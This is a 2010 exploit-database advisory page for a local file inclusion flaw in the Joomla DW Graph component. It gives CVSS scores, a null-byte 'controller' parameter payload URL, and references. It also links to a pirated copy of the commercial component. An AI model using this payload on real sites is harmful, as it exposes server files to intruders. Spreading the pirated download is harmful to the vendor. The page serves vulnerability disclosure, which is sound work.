Joomla Component DW Graph Local File Inclusion

2010.04.10
Credit: Chip D3 Bi0s
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

--------------------------------------------------------------------------------- Joomla Component DW Graph Local File Inclusion --------------------------------------------------------------------------------- Author : Chip D3 Bi0s Group : LatinHackTeam Email & msn : chipdebios@gmail.com Date : 31 March 2010 Critical Lvl : Moderate Impact : Exposure of sensitive information Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : DW Graph Component Developer : DecryptWeb License : GPL type : Commercial Price : $5.00 Date Added : 25 March 2010 Download : http://shop.decryptweb.com/extensions/joomla/graph-component.html my gift (free) : http://rapidshare.com/files/370201416/dwgraphs_unzipfirst.zip.html Demo : http://demo.decryptweb.com/joomla/dwgraphs Description : DW Graph Component is a Joomla 1.5 native component for displaying graphs. With this component you can input numerical values with the help of CSV file and can show graphical representation of the input data in the site frontend. Various parameters can be configured for display of graph. --------------------------------------------------------------------------- file error : /components/com_dwgraphs/dwgraphs.php how to exploit http://127.0.0.1/index.php?option=com_dwgraphs&controller={lfi}%00 +++++++++++++++++++++++++++++++++++++++ [!] Produced in South America +++++++++++++++++++++++++++++++++++++++

References:

http://www.securityfocus.com/bid/39108
http://www.exploit-db.com/exploits/11978
http://secunia.com/advisories/39200
http://packetstormsecurity.org/1003-exploits/joomladwgraph-lfi.txt
http://osvdb.org/63345


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top